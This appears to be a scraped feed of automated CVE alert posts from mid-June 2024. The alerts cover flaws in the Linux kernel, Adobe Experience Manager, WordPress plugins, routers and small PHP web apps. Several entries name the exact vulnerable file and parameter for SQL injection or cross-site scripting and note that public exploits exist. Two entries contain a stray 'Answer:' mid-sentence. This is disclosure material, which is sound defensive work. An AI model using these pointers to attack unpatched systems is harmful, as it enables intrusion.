| 2024-06-16 13:37:31 |
🚨 CVE-2024-27065In the Linux kernel, the following vulnerability has been resolved:netfilter: nf_tables: do not compare internal table flags on updatesRestore skipping transaction if table update does not modify flags.🎖@cveNotify |
|
| 2024-06-16 13:37:30 |
🚨 CVE-2024-26835In the Linux kernel, the following vulnerability has been resolved:netfilter: nf_tables: set dormant flag on hook register failureWe need to set the dormant flag again if we fail to registerthe hooks.During memory pressure hook registration can fail and we end upwith a table marked as active but no registered hooks.On table/base chain deletion, nf_tables will attempt to unregisterthe hook again which yields a warn splat from the nftables core.🎖@cveNotify |
|
| 2024-06-16 13:37:26 |
🚨 CVE-2024-26643In the Linux kernel, the following vulnerability has been resolved:netfilter: nf_tables: mark set as dead when unbinding anonymous set with timeoutWhile the rhashtable set gc runs asynchronously, a race allows it tocollect elements from anonymous sets with timeouts while it is beingreleased from the commit path.Mingi Cho originally reported this issue in a different path in 6.1.xwith a pipapo set with low timeouts which is not possible upstream since7395dfacfff6 ("netfilter: nf_tables: use timestamp to check for setelement timeout").Fix this by setting on the dead flag for anonymous sets to skip async gcin this case.According to 08e4c8c5919f ("netfilter: nf_tables: mark newset as dead ontransaction abort"), Florian plans to accelerate abort path by releasingobjects via workqueue, therefore, this sets on the dead flag for abortpath too.🎖@cveNotify |
|
| 2024-06-16 13:37:25 |
🚨 CVE-2024-26581In the Linux kernel, the following vulnerability has been resolved:netfilter: nft_set_rbtree: skip end interval element from gcrbtree lazy gc on insert might collect an end interval element that hasbeen just added in this transactions, skip end interval elements thatare not yet active.🎖@cveNotify |
|
| 2024-06-16 13:37:24 |
🚨 CVE-2023-52433In the Linux kernel, the following vulnerability has been resolved:netfilter: nft_set_rbtree: skip sync GC for new elements in this transactionNew elements in this transaction might expired before such transactionends. Skip sync GC for such elements otherwise commit path might walkover an already released object. Once transaction is finished, async GCwill collect such expired element.🎖@cveNotify |
|
| 2024-06-16 08:37:24 |
🚨 CVE-2024-36397Vantiva - MediaAccess DGA2232 v19.4 - CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')🎖@cveNotify |
|
| 2024-06-16 03:37:25 |
🚨 CVE-2024-38428url.c in GNU Wget through 1.24.5 mishandles semicolons in the userinfo subcomponent of a URI, and thus there may be insecure behavior in which data that was supposed to be in the userinfo subcomponent is misinterpreted to be part of the host subcomponent.🎖@cveNotify |
|
| 2024-06-16 03:37:24 |
🚨 CVE-2024-3049A flaw was found in Booth, a cluster ticket manager. If a specially-crafted hash is passed to gcry_md_get_algo_dlen(), it may allow an invalid HMAC to be accepted by the Booth server.🎖@cveNotify |
|
| 2024-06-16 02:37:24 |
🚨 CVE-2024-38427In International Color Consortium DemoIccMAX before 85ce74e, a logic flaw in CIccTagXmlProfileSequenceId::ParseXml in IccXML/IccLibXML/IccTagXml.cpp results in unconditionally returning false.🎖@cveNotify |
|
| 2024-06-16 01:37:24 |
🚨 CVE-2024-38395In iTerm2 before 3.5.2, the "Terminal may report window title" setting is not honored, and thus remote code execution might occur but "is not trivially exploitable."🎖@cveNotify |
|
| 2024-06-16 00:37:24 |
🚨 CVE-2024-38394Mismatches in interpreting USB authorization policy between GNOME Settings Daemon (GSD) through 46.0 and the Linux kernel's underlying device matching logic allow a physically proximate attacker to access some unintended Linux kernel USB functionality, such as USB device-specific kernel modules and filesystem implementations. NOTE: the GSD supplier indicates that consideration of a mitigation for this within GSD would be in the context of "a new feature, not a CVE."🎖@cveNotify |
|
| 2024-06-15 19:37:24 |
🚨 CVE-2024-6016A vulnerability, which was classified as critical, has been found in itsourcecode Online Laundry Management System 1.0. Affected by this issue is some unknown functionality of the file admin_class.php. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-268724.🎖@cveNotify |
|
| 2024-06-15 17:37:25 |
🚨 CVE-2024-6015A vulnerability classified as critical was found in itsourcecode Online House Rental System 1.0. Affected by this vulnerability is an unknown functionality of the file manage_user.php. The manipulation of the argument month_of leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-268723.🎖@cveNotify |
|
| 2024-06-15 17:37:24 |
🚨 CVE-2024-6014A vulnerability classified as critical has been found in itsourcecode Document Management System 1.0. Affected is an unknown function of the file edithis.php. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-268722 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-06-15 16:37:25 |
🚨 CVE-2024-6013A vulnerability was found in itsourcecode Online Book Store 1.0. It has been rated as critical. This issue affects some unknown processing of the file admin_delete.php. The manipulation of the argument bookisbn leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-268721 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-06-15 16:37:24 |
🚨 CVE-2024-6009A vulnerability has been found in itsourcecode Event Calendar 1.0 and classified as critical. Affected by this vulnerability is the function regConfirm/regDelete of the file process.php. The manipulation of the argument userId leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-268699.🎖@cveNotify |
|
| 2024-06-15 15:37:24 |
🚨 CVE-2024-6008A vulnerability, which was classified as critical, was found in itsourcecode Online Book Store up to 1.0. Affected is an unknown function of the file /edit_book.php. The manipulation of the argument image leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-268698 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-06-15 14:37:25 |
🚨 CVE-2024-31870IBM Db2 for i 7.2, 7.3, 7.4, and 7.5 supplies user defined table function is vulnerable to user enumeration by a local authenticated attacker, without having authority to the related *USRPRF objects. This can be used by a malicious actor to gather information about users that can be targeted in further attacks. IBM X-Force ID: 287174.🎖@cveNotify |
|
| 2024-06-15 14:37:24 |
🚨 CVE-2024-27275IBM i 7.2, 7.3, 7.4, and 7.5 contains a local privilege escalation vulnerability caused by an insufficient authority requirement. A local user without administrator privilege can configure a physical file trigger to execute with the privileges of a user socially engineered to access the target file. The correction is to require administrator privilege to configure trigger support. IBM X-Force ID: 285203.🎖@cveNotify |
|
| 2024-06-15 13:37:24 |
🚨 CVE-2024-6007A vulnerability classified as critical has been found in Netentsec NS-ASG Application Security Gateway 6.3. This affects an unknown part of the file /protocol/iscgwtunnel/deleteiscgwrouteconf.php. The manipulation of the argument messagecontent leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-268695. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-06-15 12:37:24 |
🚨 CVE-2024-6006A vulnerability was found in ZKTeco ZKBio CVSecurity V5000 4.1.0. It has been rated as problematic. Affected by this issue is some unknown functionality of the component Summer Schedule Handler. The manipulation of the argument Schedule Name leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-268694 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-06-15 10:37:26 |
🚨 CVE-2024-6005A vulnerability was found in ZKTeco ZKBio CVSecurity V5000 4.1.0. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the component Department Section. The manipulation of the argument Department Name leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-268693 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-06-15 10:37:25 |
🚨 CVE-2022-45063xterm before 375 allows code execution via font ops, e.g., because an OSC 50 response may have Ctrl-g and therefore lead to command execution within the vi line-editing mode of Zsh. NOTE: font ops are not allowed in the xterm default configurations of some Linux distributions.🎖@cveNotify |
|
| 2024-06-15 10:37:24 |
🚨 CVE-2003-0063The xterm terminal emulator in XFree86 4.2.0 and earlier allows attackers to modify the window title via a certain character escape sequence and then insert it back to the command line in the user's terminal, e.g. when the user views a file containing the malicious sequence, which could allow the attacker to execute arbitrary commands.🎖@cveNotify |
|
| 2024-06-15 06:37:24 |
🚨 CVE-2024-1399The Restaurant Menu – Food Ordering System – Table Reservation plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to, and including, 2.4.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-06-15 04:37:26 |
🚨 CVE-2024-6000The FooEvents for WooCommerce plugin for WordPress is vulnerable to unauthorized arbitrary file uploads due to an improper capability setting on the 'display_ticket_themes_page' function in versions up to, and including, 1.19.20. This makes it possible for authenticated attackers with contributor-level capabilities or above, to upload arbitrary files on the affected site's server which may make remote code execution possible. This was partially patched in 1.19.20, and fully patched in 1.19.21.🎖@cveNotify |
|
| 2024-06-15 04:37:25 |
🚨 CVE-2024-5868The WooCommerce - Social Login plugin for WordPress is vulnerable to Email Verification in all versions up to, and including, 2.6.2 via the use of insufficiently random activation code. This makes it possible for unauthenticated attackers to bypass the email verification.🎖@cveNotify |
|
| 2024-06-15 04:37:24 |
🚨 CVE-2023-52076Atril Document Viewer is the default document reader of the MATE desktop environment for Linux. A path traversal and arbitrary file write vulnerability exists in versions of Atril prior to 1.26.2. This vulnerability is capable of writing arbitrary files anywhere on the filesystem to which the user opening a crafted document has access. The only limitation is that this vulnerability cannot be exploited to overwrite existing files, but that doesn't stop an attacker from achieving Remote Command Execution on the target system. Version 1.26.2 of Atril contains a patch for this vulnerability.🎖@cveNotify |
|
| 2024-06-15 03:37:24 |
🚨 CVE-2024-23120A maliciously crafted STP and STEP file when parsed in ASMIMPORT228A.dll and ASMIMPORT229A.dll and through Autodesk applications can force an Out-of-Bound Write. A malicious actor can leverage this vulnerability to cause a crash, read sensitive data, or execute arbitrary code in the context of the current process.🎖@cveNotify |
|
| 2024-06-15 02:37:32 |
🚨 CVE-2024-4479The Jeg Elementor Kit plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the sg_general_toggle_tab_enable and sg_accordion_style attributes within the plugin's JKit - Tabs and JKit - Accordion widget, respectively, in all versions up to, and including, 2.6.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-06-15 02:37:26 |
🚨 CVE-2024-3815The Newspaper theme for WordPress is vulnerable to Stored Cross-Site Scripting via attachment meta in the archive page in all versions up to, and including, 12.6.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-06-15 02:37:25 |
🚨 CVE-2024-2544The Popup Builder plugin for WordPress is vulnerable to unauthorized modification of data and loss of data due to a missing capability check on all AJAX actions. This makes it possible for authenticated attackers, with subscriber-level access and above, to perform multiple unauthorized actions, such as deleting subscribers, and importing subscribers to conduct stored cross-site scripting attacks.🎖@cveNotify |
|
| 2024-06-15 02:37:24 |
🚨 CVE-2023-6696The Popup Builder – Create highly converting, mobile friendly marketing popups. plugin for WordPress is vulnerable to unauthorized access of functionality due to a missing capability check on several functions in all versions up to, and including, 4.3.1. While some functions contain a nonce check, the nonce can be obtained from the profile page of a logged-in user. This allows subscribers to perform several actions including deleting subscribers and perform blind Server-Side Request Forgery.🎖@cveNotify |
|
| 2024-06-15 00:37:26 |
🚨 CVE-2024-23134A maliciously crafted IGS or IGES file in tbb.dll when parsed through Autodesk AutoCAD can be used in user-after-free vulnerability. This vulnerability, along with other vulnerabilities, could lead to code execution in the current process.🎖@cveNotify |
|
| 2024-06-14 22:37:26 |
🚨 CVE-2024-6003A vulnerability was found in Guangdong Baolun Electronics IP Network Broadcasting Service Platform 2.0. It has been classified as critical. Affected is an unknown function of the file /api/v2/maps. The manipulation of the argument orderColumn leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-268692. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-06-14 22:37:25 |
🚨 CVE-2024-30119HCL DRYiCE Optibot Reset Station is impacted by a missing Strict Transport Security Header. This could allow an attacker to intercept or manipulate data during redirection.🎖@cveNotify |
|
| 2024-06-14 22:37:24 |
🚨 CVE-2024-21988StorageGRID (formerly StorageGRID Webscale) versions prior to 11.7.0.9 and 11.8.0.5 are susceptible to disclosure of sensitive information via complex MiTM attacks due to a vulnerability in the SSH cryptographic implementation.🎖@cveNotify |
|
| 2024-06-14 20:37:40 |
🚨 CVE-2024-37889MyFinances is a web application for managing finances. MyFinances has a way to access other customer invoices while signed in as a user. This method allows an actor to access PII and financial information from another account. The vulnerability is fixed in 0.4.6.🎖@cveNotify |
|
| 2024-06-14 20:37:36 |
🚨 CVE-2024-36162Adobe Experience Manager versions 6.5.20 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.🎖@cveNotify |
|
| 2024-06-14 20:37:35 |
🚨 CVE-2024-36160Adobe Experience Manager versions 6.5.20 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.🎖@cveNotify |
|
| 2024-06-14 20:37:34 |
🚨 CVE-2024-36159Adobe Experience Manager versions 6.5.20 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.🎖@cveNotify |
|
| 2024-06-14 20:37:31 |
🚨 CVE-2024-36158Adobe Experience Manager versions 6.5.20 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.🎖@cveNotify |
|
| 2024-06-14 20:37:30 |
🚨 CVE-2024-36154Adobe Experience Manager versions 6.5.20 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.🎖@cveNotify |
|
| 2024-06-14 20:37:29 |
🚨 CVE-2024-36153Adobe Experience Manager versions 6.5.20 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.🎖@cveNotify |
|
| 2024-06-14 20:37:26 |
🚨 CVE-2024-36152Adobe Experience Manager versions 6.5.20 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.🎖@cveNotify |
|
| 2024-06-14 20:37:25 |
🚨 CVE-2024-26330An issue was discovered in Kape CyberGhostVPN 8.4.3.12823 on Windows. After a successful logout, user credentials remain in memory while the process is still open, and can be obtained by dumping the process memory and parsing it.🎖@cveNotify |
|
| 2024-06-14 20:37:24 |
🚨 CVE-2024-0446A maliciously crafted STP, CATPART or MODEL file when parsed in ASMKERN228A.dll and ASMdatax229A.dll through Autodesk applications can force an Out-of-Bound Write. A malicious actor can leverage this vulnerability to cause a crash, read sensitive data, or execute arbitrary code in the context of the current process.🎖@cveNotify |
|
| 2024-06-14 20:07:42 |
🚨 CVE-2024-34119Adobe Experience Manager versions 6.5.20 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.🎖@cveNotify |
|
| 2024-06-14 20:07:41 |
🚨 CVE-2024-26121Adobe Experience Manager versions 6.5.20 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.🎖@cveNotify |
|
| 2024-06-14 20:07:40 |
🚨 CVE-2024-26116Adobe Experience Manager versions 6.5.20 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If an attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.🎖@cveNotify |
|
| 2024-06-14 20:07:37 |
🚨 CVE-2024-26115Adobe Experience Manager versions 6.5.20 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If an attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.🎖@cveNotify |
|
| 2024-06-14 20:07:36 |
🚨 CVE-2024-26111Adobe Experience Manager versions 6.5.20 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If an attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.🎖@cveNotify |
|
| 2024-06-14 20:07:35 |
🚨 CVE-2024-26110Adobe Experience Manager versions 6.5.20 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.🎖@cveNotify |
|
| 2024-06-14 20:07:32 |
🚨 CVE-2024-26095Adobe Experience Manager versions 6.5.20 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.🎖@cveNotify |
|
| 2024-06-14 20:07:31 |
🚨 CVE-2024-26092Adobe Experience Manager versions 6.5.20 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.🎖@cveNotify |
|
| 2024-06-14 20:07:30 |
🚨 CVE-2024-26058Adobe Experience Manager versions 6.5.20 and earlier Answer: are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability. This vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser session. Exploitation of this issue requires user interaction, such as convincing a victim to click on a specially crafted link.🎖@cveNotify |
|
| 2024-06-14 20:07:26 |
🚨 CVE-2024-26055Adobe Experience Manager versions 6.5.20 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability. This vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser session. Exploitation of this issue typically requires user interaction, such as convincing a victim to click on a specially crafted link or to submit a form that triggers the malicious script.🎖@cveNotify |
|
| 2024-06-14 20:07:25 |
🚨 CVE-2024-26037Adobe Experience Manager versions 6.5.20 and earlier Answer: are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability. This vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser session. Exploitation of this issue typically requires user interaction, such as convincing a user to click on a specially crafted link or to submit a malicious form.🎖@cveNotify |
|
| 2024-06-14 19:07:25 |
🚨 CVE-2024-26066Adobe Experience Manager versions 6.5.20 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.🎖@cveNotify |
|
| 2024-06-14 19:07:24 |
🚨 CVE-2024-26060Adobe Experience Manager versions 6.5.20 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.🎖@cveNotify |
|
| 2024-06-14 18:37:32 |
🚨 CVE-2024-36599A cross-site scripting (XSS) vulnerability in Aegon Life v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the name parameter at insertClient.php.🎖@cveNotify |
|
| 2024-06-14 18:37:31 |
🚨 CVE-2024-36598An arbitrary file upload vulnerability in Aegon Life v1.0 allows attackers to execute arbitrary code via uploading a crafted image file.🎖@cveNotify |
|
| 2024-06-14 18:37:30 |
🚨 CVE-2024-36597Aegon Life v1.0 was discovered to contain a SQL injection vulnerability via the client_id parameter at clientStatus.php.🎖@cveNotify |
|
| 2024-06-14 18:37:26 |
🚨 CVE-2024-5981A vulnerability was found in itsourcecode Online House Rental System 1.0. It has been classified as critical. Affected is an unknown function of the file manage_user.php. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-268458 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-06-14 18:37:25 |
🚨 CVE-2024-26070Adobe Experience Manager versions 6.5.20 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.🎖@cveNotify |
|
| 2024-06-14 18:37:24 |
🚨 CVE-2024-35673Cross-Site Request Forgery (CSRF) vulnerability in Pure Chat by Ruby Pure Chat.This issue affects Pure Chat: from n/a through 2.22.🎖@cveNotify |
|
| 2024-06-14 18:07:25 |
🚨 CVE-2024-32896there is a possible way to bypass due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.🎖@cveNotify |
|
| 2024-06-14 18:07:24 |
🚨 CVE-2024-4358In Progress Telerik Report Server, version 2024 Q1 (10.0.24.305) or earlier, on IIS, an unauthenticated attacker can gain access to Telerik Report Server restricted functionality via an authentication bypass vulnerability.🎖@cveNotify |
|
| 2024-06-14 17:37:25 |
🚨 CVE-2024-37369A privilege escalation vulnerability exists in the affected product. The vulnerability allows low-privilege users to edit scripts, bypassing Access Control Lists, and potentially gaining further access within the system.🎖@cveNotify |
|
| 2024-06-14 17:37:24 |
🚨 CVE-2024-26169Windows Error Reporting Service Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2024-06-14 14:37:26 |
🚨 CVE-2024-5671Insecure Deserialization in some workflows of the IPS Manager allows unauthenticated remote attackers to perform arbitrary code execution and access to the vulnerable Trellix IPS Manager.🎖@cveNotify |
|
| 2024-06-14 14:37:25 |
🚨 CVE-2024-37639TOTOLINK A3700R V9.1.2u.6165_20211012 was discovered to contain a stack overflow via eport in the function setIpPortFilterRules.🎖@cveNotify |
|
| 2024-06-14 14:37:24 |
🚨 CVE-2024-37637TOTOLINK A3700R V9.1.2u.6165_20211012 was discovered to contain a stack overflow via ssid5g in the function setWizardCfg.🎖@cveNotify |
|
| 2024-06-14 13:37:37 |
🚨 CVE-2024-2023The Folders and Folders Pro plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 3.0 in Folders and 3.0.2 in Folders Pro via the 'handle_folders_file_upload' function. This makes it possible for authenticated attackers, with author access and above, to upload files to arbitrary locations on the server.🎖@cveNotify |
|
| 2024-06-14 13:37:33 |
🚨 CVE-2024-30172An issue was discovered in Bouncy Castle Java Cryptography APIs before 1.78. An Ed25519 verification code infinite loop can occur via a crafted signature and public key.🎖@cveNotify |
|
| 2024-06-14 13:37:32 |
🚨 CVE-2022-4967strongSwan versions 5.9.2 through 5.9.5 are affected by authorization bypass through improper validation of certificate with host mismatch (CWE-297). When certificates are used to authenticate clients in TLS-based EAP methods, the IKE or EAP identity supplied by a client is not enforced to be contained in the client's certificate. So clients can authenticate with any trusted certificate and claim an arbitrary IKE/EAP identity as their own. This is problematic if the identity is used to make policy decisions. A fix was released in strongSwan version 5.9.6 in August 2022 (e4b4aabc4996fc61c37deab7858d07bc4d220136).🎖@cveNotify |
|
| 2024-06-14 13:37:31 |
🚨 CVE-2024-24788A malformed DNS message in response to a query can cause the Lookup functions to get stuck in an infinite loop.🎖@cveNotify |
|
| 2024-06-14 13:37:30 |
🚨 CVE-2024-34069Werkzeug is a comprehensive WSGI web application library. The debugger in affected versions of Werkzeug can allow an attacker to execute code on a developer's machine under some circumstances. This requires the attacker to get the developer to interact with a domain and subdomain they control, and enter the debugger PIN, but if they are successful it allows access to the debugger even if it is only running on localhost. This also requires the attacker to guess a URL in the developer's application that will trigger the debugger. This vulnerability is fixed in 3.0.3.🎖@cveNotify |
|
| 2024-06-14 13:37:27 |
🚨 CVE-2024-34447An issue was discovered in Bouncy Castle Java Cryptography APIs before BC 1.78. When endpoint identification is enabled in the BCJSSE and an SSL socket is created without an explicit hostname (as happens with HttpsURLConnection), hostname verification could be performed against a DNS-resolved IP address in some situations, opening up a possibility of DNS poisoning.🎖@cveNotify |
|
| 2024-06-14 13:37:26 |
🚨 CVE-2024-2877Vault Enterprise, when configured with performance standby nodes and a configured audit device, will inadvertently log request headers on the standby node. These logs may have included sensitive HTTP request information in cleartext.This vulnerability, CVE-2024-2877, was fixed in Vault Enterprise 1.15.8.🎖@cveNotify |
|
| 2024-06-14 13:37:25 |
🚨 CVE-2024-1086A use-after-free vulnerability in the Linux kernel's netfilter: nf_tables component can be exploited to achieve local privilege escalation.The nft_verdict_init() function allows positive values as drop error within the hook verdict, and hence the nf_hook_slow() function can cause a double free vulnerability when NF_DROP is issued with a drop error which resembles NF_ACCEPT.We recommend upgrading past commit f342de4e2f33e0e39165d8639387aa6c19dff660.🎖@cveNotify |
|
| 2024-06-14 13:37:24 |
🚨 CVE-2024-22233In Spring Framework versions 6.0.15 and 6.1.2, it is possible for a user to provide specially crafted HTTP requests that may cause a denial-of-service (DoS) condition.Specifically, an application is vulnerable when all of the following are true: * the application uses Spring MVC * Spring Security 6.1.6+ or 6.2.1+ is on the classpathTypically, Spring Boot applications need the org.springframework.boot:spring-boot-starter-web and org.springframework.boot:spring-boot-starter-security dependencies to meet all conditions.🎖@cveNotify |
|
| 2024-06-14 13:07:24 |
🚨 CVE-2024-32896there is a possible way to bypass due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.🎖@cveNotify |
|
| 2024-06-14 12:37:24 |
🚨 CVE-2024-36459A CRLF cross-site scripting vulnerability has been identified in certain configurations of the SiteMinder Web Agent for IIS Web Server and SiteMinder Web Agent for Domino Web Server. As a result, an attacker can execute arbitrary Javascript code in a client browser.🎖@cveNotify |
|
| 2024-06-14 11:37:24 |
🚨 CVE-2023-51376Missing Authorization vulnerability in Brainstorm Force ProjectHuddle Client Site.This issue affects ProjectHuddle Client Site: from n/a through 1.0.34.🎖@cveNotify |
|
| 2024-06-14 10:37:26 |
🚨 CVE-2024-5685Users with "User:edit" and "Self:api" permissions can promote or demote themselves or other users by performing changes to the group's memberships via API call.This issue affects snipe-it: from v4.6.17 through v6.4.1.🎖@cveNotify |
|
| 2024-06-14 10:37:25 |
🚨 CVE-2024-34012Local privilege escalation due to insecure folder permissions. The following products are affected: Acronis Cloud Manager (Windows) before build 6.2.24135.272.🎖@cveNotify |
|
| 2024-06-14 10:37:24 |
🚨 CVE-2024-2472The LatePoint Plugin plugin for WordPress is vulnerable to unauthorized access of data and modification of data due to a missing capability check on the 'start_or_use_session_for_customer' function in all versions up to and including 4.9.9. This makes it possible for unauthenticated attackers to view other customer's cabinets, including the ability to view PII such as email addresses and to change their LatePoint user password, which may or may not be associated with a WordPress account.🎖@cveNotify |
|
| 2024-06-14 09:37:32 |
🚨 CVE-2024-25142Use of Web Browser Cache Containing Sensitive Information vulnerability in Apache Airflow. Airflow did not return "Cache-Control" header for dynamic content, which in case of some browsers could result in potentially storing sensitive data in local cache of the browser.This issue affects Apache Airflow: before 2.9.2.Users are recommended to upgrade to version 2.9.2, which fixes the issue.🎖@cveNotify |
|
| 2024-06-14 08:37:40 |
🚨 CVE-2024-5465Function vulnerabilities in the Calendar moduleImpact: Successful exploitation of this vulnerability will affect availability.🎖@cveNotify |
|
| 2024-06-14 08:37:36 |
🚨 CVE-2024-36503Memory management vulnerability in the Gralloc moduleImpact: Successful exploitation of this vulnerability will affect availability.🎖@cveNotify |
|
| 2024-06-14 08:37:35 |
🚨 CVE-2024-36501Memory management vulnerability in the boottime moduleImpact: Successful exploitation of this vulnerability can affect integrity.🎖@cveNotify |
|
| 2024-06-14 08:37:34 |
🚨 CVE-2024-36500Privilege escalation vulnerability in the AMS moduleImpact: Successful exploitation of this vulnerability may affect service confidentiality.🎖@cveNotify |
|
| 2024-06-14 08:37:31 |
🚨 CVE-2024-36499Vulnerability of unauthorized screenshot capturing in the WMS moduleImpact: Successful exploitation of this vulnerability may affect service confidentiality.🎖@cveNotify |
|
| 2024-06-14 08:37:30 |
🚨 CVE-2024-5983A vulnerability was found in itsourcecode Online Bookstore 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file bookPerPub.php. The manipulation of the argument pubid leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-268459.🎖@cveNotify |
|
| 2024-06-14 08:37:29 |
🚨 CVE-2024-32989Insufficient verification vulnerability in the system sharing pop-up moduleImpact: Successful exploitation of this vulnerability will affect availability.🎖@cveNotify |
|
| 2024-06-14 07:37:25 |
🚨 CVE-2024-31163ASUS Download Master has a buffer overflow vulnerability. An unauthenticated remote attacker with administrative privileges can exploit this vulnerability to execute arbitrary system commands on the device.🎖@cveNotify |
|
| 2024-06-14 07:37:24 |
🚨 CVE-2024-31162The specific function parameter of ASUS Download Master does not properly filter user input. An unauthenticated remote attacker with administrative privileges can exploit this vulnerability to execute arbitrary system commands on the device.🎖@cveNotify |
|
| 2024-06-14 06:37:43 |
